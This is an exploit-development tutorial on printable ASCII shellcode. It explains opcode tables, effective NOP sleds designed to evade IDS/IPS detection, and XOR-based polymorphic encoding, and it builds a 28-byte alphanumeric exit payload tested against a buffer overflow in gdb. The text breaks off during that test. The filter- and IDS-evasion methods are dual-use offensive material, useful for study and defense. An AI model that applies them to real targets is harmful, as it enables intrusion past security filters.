Printable ascii shellcode is used to evade sanitizing on the network and software layers during buffer overflow exploitation.

Introduction

Experimentation says

Ascii shellcode bypasses many character filters and is fairly easy to learn, because many ascii instructions are only one or two bytes long. The smaller the instructions, the more easily they can be obfuscated and randomized. In many buffer overflows the buffer is limited to a very small writeable segment of memory, so it is often important to use the smallest possible combination of opcodes. In other cases more buffer space is available, and things like ascii art shellcode become plausible.

Available Instructions

Protip: The printable ascii shellcode character space consists of three main ranges, with symbols falling between them:

Lowercase alpha falls between 0x61 and 0x7a (a-z). Uppercase alpha falls between 0x41 and 0x5a (A-Z). Numeric space falls between 0x30 and 0x39 (0-9).
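As a quick way to check a candidate payload against these ranges, the following is a minimal sketch. The function names `classify` and `is_alphanumeric` are hypothetical helpers introduced here for illustration, and treating everything else in 0x20-0x7e as a "symbol" is an assumption of the sketch.

```python
def classify(byte: int) -> str:
    """Return which printable range a byte value falls in."""
    if 0x30 <= byte <= 0x39:
        return "digit"
    if 0x41 <= byte <= 0x5A:
        return "upper"
    if 0x61 <= byte <= 0x7A:
        return "lower"
    if 0x20 <= byte <= 0x7E:
        return "symbol"  # assumption: any other printable character counts as a symbol
    return "non-printable"


def is_alphanumeric(code: bytes) -> bool:
    """True when every byte is a digit, an uppercase letter or a lowercase letter."""
    return all(classify(b) in ("digit", "upper", "lower") for b in code)


print(classify(ord("P")), classify(0x90))
print(is_alphanumeric(b"jFX4FH5ooooP"), is_alphanumeric(b"j0X43P[HH"))
```

The second payload fails the alphanumeric check only because of the `[` symbol; it is still fully printable.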

ASCII Shellcode Table
ASCII Value	Hex Opcode	Assembly Equivalent
0	\x30	xor
1	\x31	xor
2	\x32	xor
3	\x33	xor
4	\x34	xor al, 0x## [byte]
5	\x35	xor eax, 0x######## [DWORD]
6	\x36	SS Segment Override
7	\x37	aaa
8	\x38	cmp
9	\x39	cmp
:	\x3a	cmp
;	\x3b	cmp
<	\x3c	cmp al, 0x## [byte]
=	\x3d	cmp eax, 0x######## [DWORD]
>	\x3e	DS Segment Override
?	\x3f	aas
@	\x40	inc eax
A	\x41	inc ecx
B	\x42	inc edx
C	\x43	inc ebx
D	\x44	inc esp
E	\x45	inc ebp
F	\x46	inc esi
G	\x47	inc edi
H	\x48	dec eax
I	\x49	dec ecx
J	\x4a	dec edx
K	\x4b	dec ebx
L	\x4c	dec esp
M	\x4d	dec ebp
N	\x4e	dec esi
O	\x4f	dec edi
P	\x50	push eax
Q	\x51	push ecx
R	\x52	push edx
S	\x53	push ebx
T	\x54	push esp
U	\x55	push ebp
V	\x56	push esi
W	\x57	push edi
X	\x58	pop eax
Y	\x59	pop ecx
Z	\x5a	pop edx
[	\x5b	pop ebx
\	\x5c	pop esp
]	\x5d	pop ebp
^	\x5e	pop esi
_	\x5f	pop edi
`	\x60	pushad
a	\x61	popad
b	\x62	bound
c	\x63	arpl
d	\x64	FS Segment Override
e	\x65	GS Segment Override
f	\x66	16 Bit Operand Size
g	\x67	16 Bit Address Size
h	\x68	push 0x######## [dword]
i	\x69	imul reg/mem with immediate to reg/mem
j	\x6a	push 0x## [byte]
k	\x6b	imul immediate with reg into reg
l	\x6c	insb es:[edi], dx
m	\x6d	insd es:[edi], dx
n	\x6e	outsb dx, ds:[esi]
o	\x6f	outsd dx, ds:[esi]
p	\x70	jo 0x## [byte relative offset]
q	\x71	jno 0x## [byte relative offset]
r	\x72	jb 0x## [byte relative offset]
s	\x73	jae 0x## [byte relative offset]
t	\x74	je 0x## [byte relative offset]
u	\x75	jne 0x## [byte relative offset]
v	\x76	jbe 0x## [byte relative offset]
w	\x77	ja 0x## [byte relative offset]
x	\x78	js 0x## [byte relative offset]
y	\x79	jns 0x## [byte relative offset]
z	\x7a	jp 0x## [byte relative offset]

Constructing your NOP Sled

Notice: Most modern day IPS systems are capable of recognizing ASCII NOP sleds due to their popularity in modern exploitation. Many IPS systems look for large strings of repeating characters. The solution to this problem is to make use of 'effective NOPs', instead of simply NOPs. Combine this with a randomization sequence and one can avoid IPS detection in a few simple steps.

Instructions

ASCII NOP Pairs (Figure 1)
ASCII Pair	Hex Opcode	Register	Instructions Used	Commonly Detected
AI	\x41\x49	%ecx	INC, DEC	No
@H	\x40\x48	%eax	INC, DEC	Yes
BJ	\x42\x4A	%edx	INC, DEC	No
CK	\x43\x4B	%ebx	INC, DEC	No
DL	\x44\x4C	%esp	INC, DEC	No
EM	\x45\x4D	%ebp	INC, DEC	No
FN	\x46\x4E	%esi	INC, DEC	No
GO	\x47\x4F	%edi	INC, DEC	No

The professor says
You can put the Pair in any order, e.g. AI, IA, @H, H@, as long as both characters are used the same number of times. You can even jumble them together. The above is only true when using INC and DEC NOPs exclusively.
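The "same number of times" rule can be checked mechanically. The sketch below is an illustration only: `inc_dec_delta` and `is_effective_nop` are hypothetical names, and the model tracks register values only (INC and DEC also change CPU flags, which is ignored here).

```python
from collections import Counter

# Register order used by the single-byte INC (0x40-0x47) and DEC (0x48-0x4f) opcodes.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def inc_dec_delta(sled: bytes) -> dict:
    """Net change per register for a sled made only of INC and DEC opcodes."""
    delta = Counter()
    for b in sled:
        if 0x40 <= b <= 0x47:
            delta[REGS[b - 0x40]] += 1
        elif 0x48 <= b <= 0x4F:
            delta[REGS[b - 0x48]] -= 1
        else:
            raise ValueError(f"not an INC/DEC opcode: {b:#x}")
    # Keep only the registers whose value actually ends up different.
    return {reg: d for reg, d in delta.items() if d != 0}


def is_effective_nop(sled: bytes) -> bool:
    """True when every increment is matched by a decrement of the same register."""
    return not inc_dec_delta(sled)


print(is_effective_nop(b"AIIA@HH@"))
print(inc_dec_delta(b"AAI"))
```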

ASCII NOP Pairs (Figure 2)
ASCII Pair	Hex Opcode	Register	Instructions Used	Commonly Detected
PX	\x50\x58	%eax	PUSH, POP	No
QY	\x51\x59	%ecx	PUSH, POP	No
RZ	\x52\x5A	%edx	PUSH, POP	No
S[	\x53\x5B	%ebx	PUSH, POP	Yes
T\	\x54\x5C	%esp	PUSH, POP	Yes
U]	\x55\x5D	%ebp	PUSH, POP	Yes
V^	\x56\x5E	%esi	PUSH, POP	Yes
W_	\x57\x5F	%edi	PUSH, POP	Yes
`a	\x60\x61	ALL	PUSHAD, POPAD	Yes

Implementation

Notice: Proper combination of these instructions will work to evade repeating-character based IDS and IPS systems.

Other operations can be used as NOPs as well. Of course, these operations do actually do things, but this won't affect exploit code as long as register values are preserved.

For example, '4' or 0x34 is:

<syntaxhighlight lang="asm">xor al, 0x??</syntaxhighlight>

While '5', or 0x35, is:

<syntaxhighlight lang="asm">xor eax, 0x????????</syntaxhighlight>

So, if P5LULZX were to execute, nothing would happen other than a waste of cpu cycles. Because x86 is little-endian, the four bytes "LULZ" (4c 55 4c 5a) form the dword 0x5a4c554c. The assembly looks like:

<syntaxhighlight lang="asm">
 [intel]                        [att sysV]
 push eax                       pushl %eax
 xor eax, 0x5a4c554c            xorl $0x5a4c554c, %eax
 pop eax                        popl %eax
</syntaxhighlight>

The value of the %eax register is momentarily changed and then restored. That's not really going to modify execution flow, save for cpu cycle count. There are more examples of this too, if the goal is only to create effective NOPs. For example, PhLULZX5LULZX adds more bytes to the NOP sled:

<syntaxhighlight lang="asm">
 [intel]                        [att sysV]
 push eax                       pushl %eax
 push 0x5a4c554c                pushl $0x5a4c554c
 pop eax                        popl %eax
 xor eax, 0x5a4c554c            xorl $0x5a4c554c, %eax
 pop eax                        popl %eax
</syntaxhighlight>

PUSH/POP pairs can be mixed with INC/DEC instructions without much difficulty. Once a register has been pushed to the stack, anything can be done to its value before popping that register back off the stack.

Even arithmetic calculations can be used as long as the original values of the registers are restored. This preserves the environment for the executing shellcode.

In this example using the PUSH and POP instructions, PRQXYZQPRXYZ, the code simply rearranges the register values and then puts them back in the right place.

The assembly is as follows:

<syntaxhighlight lang="asm">
 [intel]				[att sysV]
 push eax			        pushl %eax
 push edx			        pushl %edx
 push ecx			        pushl %ecx
 pop eax				popl %eax
 pop ecx				popl %ecx
 pop edx				popl %edx
 push ecx			        pushl %ecx
 push eax			        pushl %eax
 push edx			        pushl %edx
 pop eax				popl %eax
 pop ecx				popl %ecx
 pop edx				popl %edx

</syntaxhighlight>
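Whether a PUSH/POP shuffle really restores every register is easy to get wrong by hand, so it can help to simulate it. This is a minimal sketch under stated assumptions: `run_push_pop` is a hypothetical helper, the starting register values are arbitrary, and `push esp` / `pop esp` are deliberately not modelled.

```python
# Register order used by the single-byte PUSH (0x50-0x57) and POP (0x58-0x5f) opcodes.
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]


def run_push_pop(code: bytes, regs: dict) -> dict:
    """Apply single-byte PUSH/POP opcodes to a copy of regs and return the result."""
    regs = dict(regs)  # work on a copy so the caller's values are untouched
    stack = []
    for b in code:
        if 0x50 <= b <= 0x57:
            name, is_push = REGS[b - 0x50], True
        elif 0x58 <= b <= 0x5F:
            name, is_push = REGS[b - 0x58], False
        else:
            raise ValueError(f"not a PUSH/POP opcode: {b:#x}")
        if name == "esp":
            raise ValueError("push/pop esp is not modelled in this sketch")
        if is_push:
            stack.append(regs[name])
        else:
            regs[name] = stack.pop()
    if stack:
        raise ValueError("unbalanced sequence: values left on the stack")
    return regs


# Arbitrary starting values, chosen only so that each register is distinguishable.
start = {"eax": 1, "ecx": 2, "edx": 3, "ebx": 4, "ebp": 5, "esi": 6, "edi": 7}
print(run_push_pop(b"PRQXYZQPRXYZ", start) == start)  # registers restored
print(run_push_pop(b"PQXY", start) == start)          # eax and ecx end up swapped
```

A sequence only counts as an effective NOP when the comparison with the starting state holds; a balanced number of pushes and pops is necessary but not sufficient.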

As far as the INC/DEC instructions are concerned, shellcode like ACBKJI leaves the %ecx, %edx, and %ebx registers completely unchanged. Therefore any register can be incremented any number of times, so long as the register is decremented the same number of times.

Protip: INC and DEC are single-byte instructions that typically cost a cycle or less, depending on CPU architecture, and are usually the highest performing instructions of those which are available. Using multiple combinations and implementations of this concept will yield a maximum IDS evasive effect.

Basic Encoding

Notice: Though there aren't many instructions available in the printable character space, there are still enough instructions to manipulate the values of multiple registers and the stack.

Single Byte Register Manipulation

Using only ASCII, the smallest method to zero out the %eax register is five bytes, jXX4X, examined below:

Ascii	Machine Code	Assembly
jX	\x6a\x58	push byte 0x58
X	\x58	pop eax
4X	\x34\x58	xor al, 0x58

Protip: If you look back to the explanation of the eax register, you'll see that the al register is the lowest (least significant) byte of eax.

Reviewing that five-byte combination line by line:

Assembly	Action
push 0x58	pushes the dword 0x00000058 onto the stack (bytes 58 00 00 00 in memory)
pop eax	pops that dword into eax, setting eax to 0x00000058
xor al, 0x58	because al = 0x58, al now = 0x00, making eax = 0x00000000
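The three steps in the table can be followed numerically. The sketch below is only an illustration: `zero_eax_trace` is a hypothetical name, and it assumes the immediate is a printable byte (below 0x80), so the sign extension performed by `push imm8` never sets the upper bytes.

```python
def zero_eax_trace(imm8: int) -> list:
    """Follow eax through: push imm8 / pop eax / xor al, imm8."""
    if not 0 <= imm8 <= 0x7F:
        # Printable bytes never have the top bit set, so sign extension is a no-op.
        raise ValueError("this sketch only covers immediates below 0x80")
    eax = imm8                                        # push imm8, then pop eax
    after_pop = eax
    eax = (eax & 0xFFFFFF00) | ((eax & 0xFF) ^ imm8)  # xor al, imm8 touches the low byte only
    return [after_pop, eax]


print([hex(v) for v in zero_eax_trace(0x58)])
```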

Reviewing XOR

XOR (exclusive OR) can be a serious inconvenience to developers, because xor-encoding by hand is tedious and time consuming. The XOR instruction performs a bitwise operation on two values. Where the two bits are the same, the corresponding result bit is reset to 0. Where the two bits are different, the corresponding result bit is set to 1. For example, F xor 3:

 1111 F xor
 0011 3 =
 ------------
 1100 C

Protip: Any time something is XOR'd with itself, it becomes zero.

Example A:

 1111 F xor
 1111 F =
 ------------
 0000 0

Example B:

 1001 9 xor
 1001 9 =
 ------------
 0000 0
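The same bit-by-bit layout can be generated for any pair of values. This is a small sketch; `xor_bits` is a hypothetical helper name and the four-bit default width is just a convenience for nybble-sized examples.

```python
def xor_bits(a: int, b: int, width: int = 4) -> str:
    """Render a XOR b in binary, one operand per row, in the layout used above."""
    rows = [
        f"{a:0{width}b}",
        f"{b:0{width}b}",
        "-" * width,
        f"{a ^ b:0{width}b}",
    ]
    return "\n".join(rows)


print(xor_bits(0xF, 0x3))
print(xor_bits(0x9, 0x9))
```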

DWORD Manipulation

Notice: Using printable ASCII as machine code one can PUSH registers, POP registers, PUSH DWORD and byte values, and XOR them.

Some of the more important printable instructions include:

Ascii	Machine Code/hex	Assembly	Operand Size
h	\x68	push 0x########	DWORD
5	\x35	xor eax, 0x########	DWORD
4	\x34	xor al, 0x##	BYTE
X	\x58	pop eax	No Operands
j	\x6a	push 0x##	BYTE
Q	\x51	push ecx	No Operands
P	\x50	push eax	No Operands
Y	\x59	pop ecx	No Operands
Z	\x5a	pop edx	No Operands

So, a small example of ASCII to modify the entire DWORD value of the eax register and set the register value to zero is hLULZX5LULZ:

Ascii	Machine Code	Assembly
hLULZ	\x68\x4c\x55\x4c\x5a	push 0x5a4c554c
X	\x58	pop eax
5LULZ	\x35\x4c\x55\x4c\x5a	xor eax, 0x5a4c554c

And the DWORD eax register has been manipulated and set to 0 in 11 bytes.
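Byte order is the easiest thing to get wrong when turning an ascii string into an immediate. As a minimal sketch (the helper name `ascii_to_dword` is hypothetical), Python's standard `struct` module can show which dword a four-character operand actually encodes on little-endian x86:

```python
import struct


def ascii_to_dword(text: bytes) -> int:
    """Interpret four ascii bytes as the little-endian dword the CPU will see."""
    if len(text) != 4:
        raise ValueError("a dword immediate is exactly four bytes")
    return struct.unpack("<I", text)[0]


value = ascii_to_dword(b"LULZ")
print(hex(value))          # the immediate encoded by hLULZ and 5LULZ
print(hex(value ^ value))  # push / pop / xor with the same dword leaves zero
```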

Protip: By manipulating the eax register and then pushing it to the stack, you can pop its value into other registers so that the value may be preserved, or so that other registers may be used as necessary.

An introduction to Polymorphic Shellcode

Polymorphic code refers to a piece of code's ability to change itself. Machine code can modify itself through any of the functions which allow modification of registers and the stack. Self-modifying code is generally used to prevent the reverse-engineer from understanding the code. This method of code obfuscation is quite common and is considered a standard in most targeted exploitations.

Due to the nature of the stack on the x86 architecture, the stack grows backwards (toward lower addresses), while code executes forwards (toward higher addresses).

During the first instruction of a buffer overflow payload's execution, the esp register points to the top of the stack we overflowed. By manipulating this register properly during shellcode execution, code within the context of the currently executing buffer can be modified or overwritten. To apply this concept to polymorphic shellcode, the esp register must be pointing to a location in the stack ahead of the code currently executing. Because the stack grows backwards, pushed bytes will be written in front of the code being executed, and the code executing will eventually hit the bytes of machine code pushed to the stack.

Protip: Without ASCII limitations, we have several instructions, or "modifiers" that we can use for our morphing. Generally, any instruction that can be used to modify the value of a register, in relation to itself (anything other than moving a value into a register) is considered a modifier. Modifiers, including ASCII modifiers, are as follows:

add sub dec inc xor or and not imul idiv shl shr ror rol insb outsb

Notice: This article will only cover printable ascii polymorphic code.

Pushing Nops

The goal is to decode binary ahead of the currently executing printable ascii code. Pushing a single register subtracts 4 from the stack pointer (%esp), and popping a single register adds 4 to it. When the popad (or popa) instruction is used, %esp has 32 bytes added to it, as 8 registers are popped off the stack at once.
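To keep track of where %esp ends up, the bookkeeping can be written down as a small function. This is a sketch under stated assumptions: `esp_delta` is a hypothetical name, it handles only the single-byte register PUSH/POP, pushad and popad opcodes, and it rejects `pop esp` because that instruction loads %esp instead of adjusting it.

```python
def esp_delta(code: bytes) -> int:
    """Net change to %esp after a run of single-byte stack opcodes."""
    delta = 0
    for b in code:
        if 0x50 <= b <= 0x57:    # push reg
            delta -= 4
        elif b == 0x5C:          # pop esp replaces %esp, so a delta is meaningless
            raise ValueError("pop esp is not modelled in this sketch")
        elif 0x58 <= b <= 0x5F:  # pop reg
            delta += 4
        elif b == 0x60:          # pushad
            delta -= 32
        elif b == 0x61:          # popad
            delta += 32
        else:
            raise ValueError(f"opcode {b:#x} is outside this sketch")
    return delta


print(esp_delta(b"a"), esp_delta(b"aP"), esp_delta(b"ZZ"))
```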

Suppose one wanted to use the eax register, set it to all NOPs (0x90) and push it onto the stack, using nothing but ASCII. We can't use the \x90 opcode directly, because \x90 does not live in the ASCII keyspace. Obviously this isn't very useful on its own, but the concept is the important part. A very basic polymorphic code is how we will push 0x90909090 onto the stack without referencing the actual value 0x90 a single time. In the shortest amount of bytes possible, the shellcode to do so is jFX4FH5ooooP (12 bytes). Let's analyze that:

Ascii	Machine Code	Assembly
jF	\x6a\x46	pushb $0x46
X	\x58	pop %eax
4F	\x34\x46	xor $0x46, %al
H	\x48	decl %eax
5oooo	\x35\x6f\x6f\x6f\x6f	xorl $0x6f6f6f6f, %eax
P	\x50	pushl %eax

If this is still confusing, this is further breakdown, following the %eax register, in both common assembly syntaxes:

ATT SystemV Assembly	Intel Assembly	Value of eax register
pushb $0x46	push 0x46
pop %eax	pop eax	0x00000046
xorb $0x46, %al	xor al, 0x46	0x00000000
decl %eax	dec eax	0xffffffff
xorl $0x6f6f6f6f, %eax	xor eax, 0x6f6f6f6f	0x90909090
pushl %eax	push eax

There are two things happening here which haven't been covered thoroughly. The first one of these is the dec eax, or the \x48 instruction. Usually, dec simply decrements the affected register. However, when that register is already equal to 0x00000000, dec will underflow and set the register to 0xffffffff. The second thing is the XOR instruction. The XOR instruction in the above code does an exclusive or as follows:

 0xffffffff xor
 0x6f6f6f6f

And stores the value in eax, then PUSHes eax. This is a nybble by nybble, byte by byte following of the exclusive or instruction:

 1111	1111	1111	1111	1111	1111	1111	1111	(FFFFFFFF) xor
 0110	1111	0110	1111	0110	1111	0110	1111	(6F6F6F6F) =
 ----	----	----	----	----	----	----	----	--------------
 1001	0000	1001	0000	1001	0000	1001	0000	(90909090)

Polymorphic code should consist of methods which place a random or common value into a register, and then XOR the register until the desired value has been reached. We can start the register value at any ASCII value, at 0x00000000, or at 0xffffffff, by XORing a register with itself, or by setting the register value to zero and then decrementing it.
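Starting from 0xffffffff, the XOR mask needed for a given target is just the bitwise complement, and the only question is whether every byte of that mask is printable. The following is a minimal sketch; `mask_from_all_ones` is a hypothetical helper, and the printable range 0x30-0x7a is the working range this article uses.

```python
PRINTABLE = range(0x30, 0x7B)  # 0x30 through 0x7a inclusive


def mask_from_all_ones(target: int):
    """Return the dword that XORs 0xffffffff into target, or None if it is not printable."""
    mask = target ^ 0xFFFFFFFF
    if all(b in PRINTABLE for b in mask.to_bytes(4, "little")):
        return mask
    return None


print(hex(mask_from_all_ones(0x90909090)))  # the 'oooo' operand
print(mask_from_all_ones(0xFFFF80CD))       # not reachable with one printable dword
```

When a single mask is not printable, the target can still be reached by splitting the XOR into two or more printable steps.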

Notice that this shellcode is 100% alphanumeric. There is, of course, non-ASCII and non-alphanumeric polymorphic code, which has far fewer restrictions than printable ASCII or alphanumeric bytecode.

A sequence for exit

On linux/x86 the exit system call is pretty straightforward:

 .section .data
 .section .text
 .globl _start
 _start:
     xorl %eax, %eax
     incl %eax
     xorl %ebx, %ebx
     int $0x80

The professor says

If you'd like to test this, put the contents of the above code box into a textfile named exit.s. Then run the following commands in your bash prompt:

as exit.s --32 -o exit.o ; ld exit.o -o exit ; ./exit

You will see that exit executes without crashing due to a segmentation fault or anything of that nature. The above code sets the system call number (the %eax register) to 1 (the exit system call), and the exit code (the %ebx register) to 0, which you can see by doing the following:

./exit ; echo $?

We're going to use the exit code "3" for our example of polymorphism, so we'll be able to see if our shellcode properly executed. We'll use the following code:

 .section .data
 .section .text
 .globl _start
 _start:
     xorl %eax, %eax
     incl %eax
     movl $3, %ebx
     int $0x80

Go ahead and re-assemble and execute this, testing for the exit code:

 [user@host ~]$ echo $?
 3

From assembling to machine code

To get shellcode for the exit sequence, one can use the objdump command-line utility:

 [user@host ~]$ objdump -d exit
 exit:     file format elf64-x86-64
 Disassembly of section .text:
 0000000000400078 <_start>:
   400078:  31 c0             xor    %eax,%eax
   40007a:  ff c0             inc    %eax
   40007c:  bb 03 00 00 00    mov    $0x3,%ebx
   400081:  cd 80             int    $0x80

Objdump did a decent favor here - breaking the output into table format:

Memory Address	Machine Code	Assembly
400078	31 c0	xor %eax,%eax
40007a	ff c0	inc %eax
40007c	bb 03 00 00 00	mov $0x3,%ebx
400081	cd 80	int $0x80

It can be easily determined that the machine code for this is "\x31\xc0\xff\xc0\xbb\x03\x00\x00\x00\xcd\x80"

Examining the assembly and shellcode further: because we can easily manipulate eax and ebx, the real challenge here is getting "\xcd\x80" onto the stack. It also has to go on first, since it is executed last. Closer examination will also reveal that one need not push the other instructions, so long as the values of %ebx and %eax are sound when the kernel interrupt is called. Because "\xcd\x80" is two bytes, or a word, we will have to use the 0x66 (or f in alpha) instruction prefix to force a 16-bit operand size in conjunction with the 0x35 xor instruction. We still have to find values that XOR to the required word while every byte stays in the printable character space (between 0x30 and 0x7a).

Converting Exit to Printable Ascii

We need to keep the following in mind when converting our exit shellcode to ascii:

For successful exploitation, we'll have to use a trick from our ascii nop example to get eax to 0xffffffff.
Our target is ????80cd, because it must go onto the stack backwards.
The first two bytes will be completely irrelevant, as they will occur in our stack after the kernel interrupt for exit.
The %eax register must equal the value '1' when the interrupt is called.
The %ebx register must equal the decimal value '3' or hexadecimal value 0x03 when the interrupt is called.

eax & ebx

Let's take a look at %ebx. We'll need to set its value to 0x03. The best way we can do that is by manipulating the %eax register, then pushing the eax register and popping the value back into %ebx. We can do that with the following code:

 pushb $0x30
 pop %eax
 xorb $0x33, %al
 pushl %eax
 pop %ebx

Now %ebx and %eax are both 3. The %eax register can simply be decremented twice (H in alpha) to get to the value of '1'.

When analyzed:

Assembly	Machine Code	Ascii
pushb $0x30	\x6a\x30	j0
pop %eax	\x58	X
xor $0x33, %al	\x34\x33	43
pushl %eax	\x50	P
pop %ebx	\x5b	[
decl %eax	\x48	H
decl %eax	\x48	H

The ascii code for this manipulation of the %eax and %ebx registers looks like "j0X43P[HH".
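A tiny emulator makes it possible to confirm register values without assembling anything. The sketch below is an illustration under stated assumptions: `emulate` and `reg_name` are hypothetical helpers, all registers are assumed to start at zero, %esp is not modelled, and only the handful of printable opcodes used in this section are supported.

```python
REGS = ["eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"]
MASK = 0xFFFFFFFF


def reg_name(op: int, base: int) -> str:
    """Map a single-byte register opcode to its register name."""
    name = REGS[op - base]
    if name == "esp":
        raise ValueError("esp is not modelled in this sketch")
    return name


def emulate(code: bytes) -> dict:
    """Run a few printable opcodes over zeroed registers and return the final values."""
    regs = {r: 0 for r in REGS if r != "esp"}  # assumption: everything starts at 0
    stack = []
    i = 0
    while i < len(code):
        op = code[i]
        i += 1
        if op == 0x6A:                    # push imm8, sign-extended to a dword
            imm = code[i]
            i += 1
            stack.append(imm | 0xFFFFFF00 if imm & 0x80 else imm)
        elif op == 0x34:                  # xor al, imm8 (only the low byte changes)
            regs["eax"] ^= code[i]
            i += 1
        elif 0x40 <= op <= 0x47:          # inc reg
            n = reg_name(op, 0x40)
            regs[n] = (regs[n] + 1) & MASK
        elif 0x48 <= op <= 0x4F:          # dec reg, wrapping 0 to 0xffffffff
            n = reg_name(op, 0x48)
            regs[n] = (regs[n] - 1) & MASK
        elif 0x50 <= op <= 0x57:          # push reg
            stack.append(regs[reg_name(op, 0x50)])
        elif 0x58 <= op <= 0x5F:          # pop reg
            regs[reg_name(op, 0x58)] = stack.pop()
        else:
            raise ValueError(f"opcode {op:#x} is outside this sketch")
    return regs


result = emulate(b"j0X43P[HH")
print(result["eax"], result["ebx"])
```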

The Kernel Interrupt

This next part is a bit more difficult. We need to construct \xcd\x80 on the stack. So, first, let's zero out the eax register, and decrement it to get 0xffffffff:

Assembly	Ascii
pushb $0x6a	jj
pop %eax	X
xorb $0x6a, %al	4j
decl %eax	H

Once we've run jjX4jH, we've got eax set to 0xffffffff. Now, let's determine what our target xor should be:

 FFFF xor
 80CD = 
----------
 7F32

Now, due to the way xor works, we just need to find two printable ascii values that come out to 0x7f32 when xor'd together. Because x86 is little-endian, the low byte of each immediate comes first in the machine code:

Assembly	Machine Code	Ascii
xor $0x4f65, %ax	\x66\x35\x65\x4f	f5eO
xor $0x3057, %ax	\x66\x35\x57\x30	f5W0
pushl %eax	\x50	P

And all put together, our ascii code for getting \xcd\x80 onto the stack in the correct order looks like "jjX4jHf5eOf5W0P".
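Finding printable operands whose XOR equals a target such as 0x7f32 can be done one byte at a time. This is a minimal brute-force sketch: `split_byte` and `split_word` are hypothetical helpers, and the printable range 0x30-0x7a is the one used in this article. It returns the first pair it finds, which is not necessarily the 0x4f65 / 0x3057 pair chosen in the text.

```python
PRINTABLE = range(0x30, 0x7B)  # 0x30 through 0x7a inclusive


def split_byte(target: int) -> list:
    """All pairs (a, b) of printable bytes with a ^ b == target."""
    return [(a, a ^ target) for a in PRINTABLE if (a ^ target) in PRINTABLE]


def split_word(target: int):
    """One pair of printable 16-bit values whose XOR is target, or None."""
    low = split_byte(target & 0xFF)
    high = split_byte((target >> 8) & 0xFF)
    if not low or not high:
        return None
    first = (high[0][0] << 8) | low[0][0]
    second = (high[0][1] << 8) | low[0][1]
    return first, second


pair = split_word(0x7F32)
print([hex(v) for v in pair], hex(pair[0] ^ pair[1]))
print(hex(0x4F65 ^ 0x3057))  # the pair used in the text
```

Many different pairs satisfy the same target, which is what lets an encoder vary its output from one run to the next.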

The Code

Now we need to tie all of these things together, along with our knowledge of the stack, to ensure proper execution of the code. The first thing we have to do is add to ESP. Let's find out how many bytes we must add by adding up all this shellcode. So far, we've got "jjX4jHf5eOf5W0P" to push \xcd\x80 onto the stack, and "j0X43P[HH", which uses stack space to set %eax to 1 and %ebx to 3. The next problem in the equation is that we rely on push to apply values, and we've just pushed instructions (\xcd\x80) onto the stack with the first piece, which could get overwritten or have instructions written in front of it.

There are multiple solutions to this:

Overwriting a dword (or more memory) between the currently executing code and yet-to-be-executed code with nops after its been used for the stack.
Add 8 to esp every time a piece of code is decoded and pushed to the stack, so that unpacking code will unpack forwards rather than backwards.

In this example, we're adding 8 to %esp by popping an arbitrary register that our code doesn't care about. In this case, the arbitrary register is %edx. So once the exit code has been written, %edx is popped twice to add 8 to %esp. This not only prevents us from overwriting our exit code with a single push instruction, but also prevents single-push instructions from overwriting code between the executing code and the freshly unpacked exit code.

In review:

The stack pointer (%esp) must be set to the value of our shellcode's length in bytes above the instruction pointer (%eip)
We'll have to manipulate the stack properly to avoid overwriting reconstructed instructions.

To align our stack pointer, we'll use a combination of the popad instruction and pop register instructions - this will ensure the smallest possible code. Assuming that %eip = %esp at the time of our code's execution (it rarely will; we'll get to that) the smallest possible code is 28 bytes:

 aPjjX4jHf5eOf5W0PZZj0X43P[HH

So, let's see what's going on here:

Assembly	Machine Code	Ascii	Comment
popa	\x61	a	Used to align %esp 32 bytes ahead - 4 bytes from the end of our shellcode
pushl %eax	\x50	P	Used to subtract 4 from %esp to align it immediately after our code
pushb $0x6a	\x6a\x6a	jj	put $0x6a on the stack
pop %eax	\x58	X	%eax is set to 0x6a
xorb $0x6a, %al	\x34\x6a	4j	Zero out %eax
decl %eax	\x48	H	%eax is now set to 0xffffffff so we can get to \xcd\x80 with xor
xor $0x4f65, %ax	\x66\x35\x65\x4F	f5eO	Our first round of xor
xor $0x3057, %ax	\x66\x35\x57\x30	f5W0	Sets %eax to 0xffff80cd
push %eax	\x50	P	Makes \xcd\x80\xff\xff hit the stack
pop %edx	\x5a	Z	Used to add 4 to %esp, because %edx does not matter for our code.
pop %edx	\x5a	Z	Add 4 more to %esp, now we're past the code for exit constructed in front of our code
pushb $0x30	\x6a\x30	j0	Set up to set ebx = 3
pop %eax	\x58	X	%eax = $0x30
xor $0x33, %al	\x34\x33	43	set %eax to 3 for moving it into %ebx
push %eax	\x50	P	push 0x00000003 onto the stack, ahead of our interrupt sequence
pop %ebx	\x5b	[	Set the exit code to '3' by the value off of the stack into %ebx
decl %eax	\x48	H	Since we stored 3 in %eax as well as %ebx, we can decrement %eax twice to get 1.
decl %eax	\x48	H	%eax is 1, %ebx is 3. The next bytes have been overwritten with machine code for int $0x80.

Now we just need to get this to ascii that we can put onto the stack. The preferred method to do this is by using "strings" against the generated object file. Save the above code in a file called payload.s, assemble it with 'as' and run strings on payload.o, as follows:

 [user@host ~]$ as payload.s --32 -o payload.o
 [user@host ~]$ strings payload.o 
 aPjjX4jHf5eOf5W0PZZj0X43P[HH

And to make sure it's 28 bytes:

 [user@host ~]$ echo -n $(strings payload.o)|wc
   1       1      28

Testing Our Code

Notice: Stack dumps in this segment have been shortened for brevity and readability.

Analyzing our Buffer

Using our bof.c example from buffer overflows, we're given a 100 byte buffer.

Let's start with 116 "A" characters to isolate the return pointer:

[hatter@eclipse ~]$ gdb -q ./bof
Reading symbols from /home/hatter/bof...(no debugging symbols found)...done.
(gdb) break main
Breakpoint 1 at 0x80483e7
(gdb) r `perl -e 'print "A"x116'`
Starting program: /home/hatter/bof `perl -e 'print "A"x116'`
(gdb) x/200x $esp
0xbffff538:     0x00000000      0xb7e35483      0x00000002      0xbffff5d4

Notice that %esp is aligned at 0xbffff538. Skipping to the end, our code starts appearing at 0xbffff748.

0xbffff738:     0x41410066      0x41414141      0x41414141      0x41414141
0xbffff748:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff758:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff768:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff778:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff788:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff798:     0x41414141      0x41414141      0x41414141      0x41414141
0xbffff7a8:     0x41414141      0x58004141      0x445f4744      0x5f415441

